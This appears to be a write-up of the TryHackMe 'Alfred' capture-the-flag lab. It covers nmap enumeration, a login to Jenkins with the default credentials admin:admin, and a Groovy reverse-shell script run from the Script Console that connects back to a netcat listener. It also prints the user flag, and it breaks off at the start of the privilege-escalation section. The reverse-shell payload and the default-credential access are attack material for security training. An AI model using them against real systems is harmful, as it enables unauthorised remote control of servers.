https://tryhackme.com/room/alfred

Pwned Date - 21st July 2022

Enumeration

PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 7.5
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: ALFRED
|   NetBIOS_Domain_Name: ALFRED
|   NetBIOS_Computer_Name: ALFRED
|   DNS_Domain_Name: alfred
|   DNS_Computer_Name: alfred
|   Product_Version: 6.1.7601
|_  System_Time: 2022-07-14T04:18:25+00:00
|_ssl-date: 2022-07-14T04:18:28+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2022-07-13T04:14:38
|_Not valid after:  2023-01-12T04:14:38
8080/tcp open  http               Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

On port 80 we do not have anything interesting

Untitled

On port 8080 we have this Jenkins login page

Untitled

Exploitation

With the default credential admin:admin we can login to the admin dashboard

Untitled

Going to Manage Jenkins > Script Console we can execute our command

Untitled

Do note that Jenkins is using Groovy Script so we can use the following command from

PayloadsAllTheThings/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThings

String host="10.8.21.209";
int port=1234;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Meanwhile having our netcat listening on port 1234

┌──(kali㉿VirtualBox)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.8.21.209] from (UNKNOWN) [10.10.141.203] 49192
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\\Program Files (x86)\\Jenkins>whoami
whoami
alfred\\bruce

<...SNIPPET cd to C:\\Users\\bruce\\Desktop>

C:\\Users\\bruce\\Desktop>more user.txt
79007a09481963edf2e1321abd9ae2a0

Privilege Escalation

To get all Privileges Information